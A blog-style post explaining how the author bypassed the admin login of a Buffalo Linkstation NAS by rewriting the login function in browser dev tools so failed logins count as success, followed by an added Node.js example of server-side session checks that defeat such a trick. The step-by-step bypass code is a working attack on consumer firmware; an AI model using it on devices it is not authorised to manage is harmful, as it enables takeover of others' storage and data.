Buffalo Linkstation (LS-WXL) – Admin hack

Long story short, I needed access to this NAS and it was on the other side of the planet, so a little creative coding came to the rescue.

With developer tools enabled (I used Chrome):

  • Get to the login page
  • Open dev tools sources tab
  • Open login_utis.js under the ‘authentication’ folder
  • Replace the login function with the following:
    function login(f, lang) {
      if (login_lock != 0) {
        return;
      }
      login_lock = 1;
      var uid = Ext.getCmp('user');
      var uid_value = uid.getValue();
      var pwd = Ext.getCmp('password');
      var pwd_value = pwd.getValue();
      f.form.submit({
        url: '/dynamic.pl',
        params: {bufaction: 'verifyLogin'},
        waitTitle: S('Please Wait…'),
        waitMsg: S('Logging In…'),
        success: function(form, action) {
          var decodedResponse = Ext.decode(action.response.responseText);
          var jsonData = decodedResponse.data;
          loginSuccess(f, action, uid_value, lang);
        },
        // The failure callback takes the same path as success.
        failure: function(form, action) {
          loginSuccess(f, action, uid_value, lang);
        }
      });
    }
  • Hit Ctrl+S (save the change)
  • Log in as admin with any password. I used admin/admin
  • Reset the admin account with a new password.

Bad security in this case saved a lot of hassle.
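
The steps above work because the result of verifyLogin is acted on only by the browser script. As an added example (not from the original post and not Buffalo's firmware code), here is a Node.js model of the server-side check that makes such a client edit irrelevant: a session token is issued only after the password verifies, and every later action is authorised against it. The names handle, resetPassword, token and the sample account are assumptions.

```javascript
// Added example: a model of server-side enforcement, not Buffalo firmware code.
const nodeCrypto = require('crypto');

// Constructed sample account store (salted scrypt hash), for the demo only.
const salt = nodeCrypto.randomBytes(16);
const hash = (pw) => nodeCrypto.scryptSync(String(pw), salt, 32);
const users = new Map([['admin', hash('correct horse')]]);
const sessions = new Map(); // token -> user name, held on the server

function checkPassword(user, password) {
  const stored = users.get(user);
  if (!stored) return false;
  // Constant-time comparison of two 32-byte hashes.
  return nodeCrypto.timingSafeEqual(stored, hash(password));
}

// Hypothetical dispatcher for a dynamic.pl-style endpoint.
function handle(req) {
  if (req.bufaction === 'verifyLogin') {
    if (!checkPassword(req.user, req.password)) {
      return { status: 401, success: false };
    }
    const token = nodeCrypto.randomBytes(32).toString('hex');
    sessions.set(token, req.user);
    return { status: 200, success: true, token };
  }
  // Every other action is authorised here, whatever the browser believes.
  const user = sessions.get(req.token);
  if (!user) return { status: 401, success: false };
  if (req.bufaction === 'resetPassword') { // hypothetical action name
    if (user !== 'admin') return { status: 403, success: false };
    users.set(req.target, hash(req.newPassword));
    return { status: 200, success: true };
  }
  return { status: 404, success: false };
}
```

With this shape, a browser that treats a failed login as a success still holds no valid token, so the password reset request is refused.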